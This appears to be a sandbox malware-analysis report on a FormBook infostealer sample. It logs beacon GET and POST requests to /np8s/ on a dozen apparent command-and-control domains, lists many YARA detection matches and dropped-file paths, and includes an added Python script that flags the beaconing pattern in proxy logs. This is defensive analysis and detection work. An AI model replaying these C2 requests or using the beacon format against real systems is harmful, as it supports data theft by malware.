Source: global traffic HTTP traffic detected: GET /np8s/?zVB=SjFSW0qH8X1Gu/+4r88YNPSLQa2KKx1h4LPt291Cc0nRXdmgbio7b0swgMzU3Pebjd8T&4hM4=o4B0f HTTP/1.1Host: www.brawlhallacodestore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=xL/YlJAUY6uB/cHSlkc/r5VaZJ7uMa0kbAtysG6BLnWT6huomjvuhq3RLtT5uw3RUbD6 HTTP/1.1Host: www.pdwfifi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=0fJNa1pbsGGBLLIqJIKrQqKQ2B2XPA1kKZrGWkGMUEET6sTbN1/jKODkGG9Xc1lZm5PZ&4hM4=o4B0f HTTP/1.1Host: www.68chengxinle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=MO+mSdLLrNuwRQYoVJuGLv0I5Vniy3FD6QWfbcj4un1GXTVLdefusF8/o4IGo+fIW5Ou&CTr8g=z48HVPSHfp HTTP/1.1Host: www.refreshertowels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=5R3gKgAJtID3s3glssHXeRhFadAM4oJIjGTDo+g9ImvY9tNBMPSBarPOG5Bgot7e+72k&CTr8g=z48HVPSHfp HTTP/1.1Host: www.muddybootslife.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=LP9EI17xKnNeim8nLd+KxbxmCUjQ+ejx+5/wYAWzXpI6ry2rccLFMoZPirUOcSWhDiha&CTr8g=z48HVPSHfp HTTP/1.1Host: www.84866.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=uZkZa9PDR+t76IUsjgXNksX18rdkaBR0jzgf+2QyrrE0BTZPOy5IBVEfZpk90w8gWC7R&CTr8g=z48HVPSHfp HTTP/1.1Host: www.localbloom.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=OAQ8ZAk71VYHsoGBQeS0cLLvyBMKMlAsSK0ta2CkcQgnl+jMatCDHwZEkBjakU6FhLRf HTTP/1.1Host: www.ratebill.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEMINrnM1Idbq&4hM4=o4B0f HTTP/1.1Host: www.topings33.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=d/nstEfJj6EqHIao63FJ0s9GuqA95KQHoqtaktjr9/p2jHwlkCQ3yhCEo1SUrSQk5nZl HTTP/1.1Host: www.jlbwaterdamagerepairseattle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
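The request list above is the FormBook C2 pattern an analyst wants to pick out of a proxy log: one URI path (/np8s/) requested from a dozen unrelated domains, every request closed after a single round trip, each GET carrying one short constant pair (4hM4=o4B0f, later CTr8g=z48HVPSHfp) next to one long varying zVB value, and one host additionally receiving a POST to the same path. The script below is an added example written for this report, not part of the sandbox output. It parses request lines in the report's flattened form and flags paths that fit that heuristic; the heuristic itself, the min_hosts threshold and the three favicon control lines are assumptions, while the beacon lines are copied from the report and trimmed after the Connection header.

```python
"""Flag FormBook-style C2 beaconing in the flattened HTTP lines of a
sandbox report.  Heuristic (assumption, derived from the requests listed
in the report): one URI path is requested from many unrelated hosts,
every request closes the connection, each GET carries one short key=value
pair that is constant across hosts plus one long value that varies, and
at least one host also receives a POST to the same path."""
import re
from collections import defaultdict

# Beacon lines copied from the report above, trimmed after the Connection
# header (the trailing 7 zero bytes of "Data Raw" are not needed here).
# The three favicon lines are constructed benign controls.
SAMPLE_LINES = [
    "GET /np8s/?4hM4=o4B0f&zVB=pvCvVC1srqMzTu3vjZ/Pi4S7puQ7WYlroZs2vwEH9SE4BkgUF4SEMyF7Qq3EYWraDKw9 HTTP/1.1Host: www.rasheedabossmoves.comConnection: close",
    "GET /np8s/?zVB=LP9EI17xKnNeim8nLd+KxbxmCUjQ+ejx+5/wYAWzXpI6ry2rccLFMoZPirUOcSWhDiha&4hM4=o4B0f HTTP/1.1Host: www.84866.xyzConnection: close",
    "GET /np8s/?4hM4=o4B0f&zVB=VOk/KoOKPmyFTHQXWsNAO627WiKHMN6hKQrMVwJFQe1euvxAvAuscpxAvIMnAXbQu1P/ HTTP/1.1Host: www.sekolahkejepang.comConnection: close",
    "GET /np8s/?zVB=MO+mSdLLrNuwRQYoVJuGLv0I5Vniy3FD6QWfbcj4un1GXTVLdefusF8/o4IGo+fIW5Ou&4hM4=o4B0f HTTP/1.1Host: www.refreshertowels.comConnection: close",
    "GET /np8s/?4hM4=o4B0f&zVB=OAQ8ZAk71VYHsoGBQeS0cLLvyBMKMlAsSK0ta2CkcQgnl+jMatCDHwZEkBjakU6FhLRf HTTP/1.1Host: www.ratebill.comConnection: close",
    "GET /np8s/?zVB=MO+mSdLLrNuwRQYoVJuGLv0I5Vniy3FD6QWfbcj4un1GXTVLdefusF8/o4IGo+fIW5Ou&CTr8g=z48HVPSHfp HTTP/1.1Host: www.refreshertowels.comConnection: close",
    "GET /np8s/?zVB=5R3gKgAJtID3s3glssHXeRhFadAM4oJIjGTDo+g9ImvY9tNBMPSBarPOG5Bgot7e+72k&CTr8g=z48HVPSHfp HTTP/1.1Host: www.muddybootslife.comConnection: close",
    "GET /np8s/?zVB=LP9EI17xKnNeim8nLd+KxbxmCUjQ+ejx+5/wYAWzXpI6ry2rccLFMoZPirUOcSWhDiha&CTr8g=z48HVPSHfp HTTP/1.1Host: www.84866.xyzConnection: close",
    "POST /np8s/ HTTP/1.1Host: www.jlbwaterdamagerepairseattle.comConnection: close",
    # constructed controls: same path on three hosts, but keep-alive and no query
    "GET /favicon.ico HTTP/1.1Host: www.example.netConnection: keep-alive",
    "GET /favicon.ico HTTP/1.1Host: www.example.orgConnection: keep-alive",
    "GET /favicon.ico HTTP/1.1Host: www.example.comConnection: keep-alive",
]

# The report glues headers together without newlines, so the request line,
# Host and Connection headers are recovered with one anchored pattern.
REQ_RE = re.compile(
    r"^(?P<method>GET|POST) (?P<uri>\S+) HTTP/1\.[01]"
    r"Host: (?P<host>.+?)Connection: (?P<conn>[\w-]+)"
)


def parse_query(uri):
    """Split a URI into its path and a {key: value} dict.  The query is split
    by hand: urllib.parse.parse_qsl would turn '+' inside the zVB token into
    a space and unquote %xx, so the raw token could no longer be compared."""
    path, _, qs = uri.partition("?")
    params = {}
    for pair in qs.split("&") if qs else []:
        key, _, value = pair.partition("=")
        params[key] = value
    return path, params


def parse_line(line):
    """Return a request record, or None for lines that are not requests."""
    m = REQ_RE.match(line)
    if not m:
        return None
    path, params = parse_query(m["uri"])
    return {"method": m["method"], "host": m["host"], "path": path,
            "params": params, "conn": m["conn"].lower()}


def find_beacon_clusters(lines, min_hosts=3):
    """Group requests by path and return the paths that fit the heuristic.

    Result: {path: {"hosts": [...], "markers": [(key, value), ...],
                    "variable_keys": [...], "post_hosts": [...]}}
    """
    by_path = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_path[rec["path"]].append(rec)

    clusters = {}
    for path, reqs in by_path.items():
        hosts = {r["host"] for r in reqs}
        if len(hosts) < min_hosts:
            continue                      # one site using a path is normal
        if any(r["conn"] != "close" for r in reqs):
            continue                      # FormBook closes after every request
        pair_hosts = defaultdict(set)     # (key, value) -> hosts that received it
        key_values = defaultdict(set)     # key -> distinct values seen
        for r in reqs:
            if r["method"] != "GET":
                continue
            for key, value in r["params"].items():
                pair_hosts[(key, value)].add(r["host"])
                key_values[key].add(value)
        # marker: the identical key=value pair sent to many different hosts
        markers = sorted(kv for kv, hs in pair_hosts.items() if len(hs) >= min_hosts)
        # variable field: the same key with a different value per host
        variable = sorted(k for k, vs in key_values.items() if len(vs) >= min_hosts)
        if markers and variable:
            clusters[path] = {
                "hosts": sorted(hosts),
                "markers": markers,
                "variable_keys": variable,
                "post_hosts": sorted({r["host"] for r in reqs if r["method"] == "POST"}),
            }
    return clusters


if __name__ == "__main__":
    for path, info in find_beacon_clusters(SAMPLE_LINES).items():
        print(path, "markers:", info["markers"], "variable:", info["variable_keys"])
        print("  decoy/C2 hosts:", ", ".join(info["hosts"]))
        print("  POST (exfil) hosts:", ", ".join(info["post_hosts"]))
```

Against real proxy or Zeek logs the method, host, URI and Connection fields already arrive as separate columns, so only the regex needs replacing; the grouping logic is what carries over. The marker pairs found here (4hM4=o4B0f and CTr8g=z48HVPSHfp) are campaign-specific and should be treated as IOCs for this sample, not as a generic FormBook signature; the structural pattern (shared path, constant pair, long variable token, Connection: close, a POST to one of the hosts) is the durable part.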
Source: oxx7nkdv4g8.exe, 00000017.00000002.891742293.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.bin.exe.10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.bin.exe.10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000000.888258763.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.577518053.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.577466338.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.577252910.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.539227750.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.981077246.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000001.447624352.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1028333019.0000000004867000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.972949650.0000000000484000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.891623399.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.451386308.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.887276277.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.447599993.000001C6B5DA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.515738987.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.887613995.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.447905033.000001C6B609A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.982531208.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.447458593.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.959879577.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.455268485.000001C6B6770000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.452309362.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.454366130.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.448608329.000001C6B5E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.887927975.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED

System Summary

Source: 23.0.oxx7nkdv4g8.exe.8d0000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 23.0.oxx7nkdv4g8.exe.8d0000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 23.0.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 23.0.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.bin.exe.10000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.bin.exe.10000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 23.0.oxx7nkdv4g8.exe.8d0000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 23.0.oxx7nkdv4g8.exe.8d0000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.bin.exe.10000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.bin.exe.10000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 23.0.oxx7nkdv4g8.exe.8d0000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 23.0.oxx7nkdv4g8.exe.8d0000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 23.2.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 23.2.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000000.888258763.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000000.888258763.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.577518053.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.577518053.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.577466338.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.577466338.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.577252910.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.577252910.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.539227750.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.539227750.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.981077246.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.981077246.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000001.447624352.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000001.447624352.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.1028333019.0000000004867000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.1028333019.0000000004867000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.972949650.0000000000484000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.972949650.0000000000484000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.891623399.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.891623399.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.451386308.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.451386308.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000000.887276277.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000000.887276277.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.447599993.000001C6B5DA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.447599993.000001C6B5DA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.515738987.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.515738987.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000000.887613995.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000000.887613995.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.447905033.000001C6B609A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.447905033.000001C6B609A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.982531208.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.982531208.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.447458593.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.447458593.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.959879577.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.959879577.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.455268485.000001C6B6770000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.455268485.000001C6B6770000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.452309362.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.452309362.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.454366130.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.454366130.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.448608329.000001C6B5E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.448608329.000001C6B5E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000000.887927975.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000000.887927975.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\wtheeNaAZG.js
Source: 23.0.oxx7nkdv4g8.exe.8d0000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 23.0.oxx7nkdv4g8.exe.8d0000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 23.0.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 23.0.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.bin.exe.10000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.bin.exe.10000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 23.0.oxx7nkdv4g8.exe.8d0000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 23.0.oxx7nkdv4g8.exe.8d0000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.bin.exe.10000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.bin.exe.10000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 23.0.oxx7nkdv4g8.exe.8d0000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
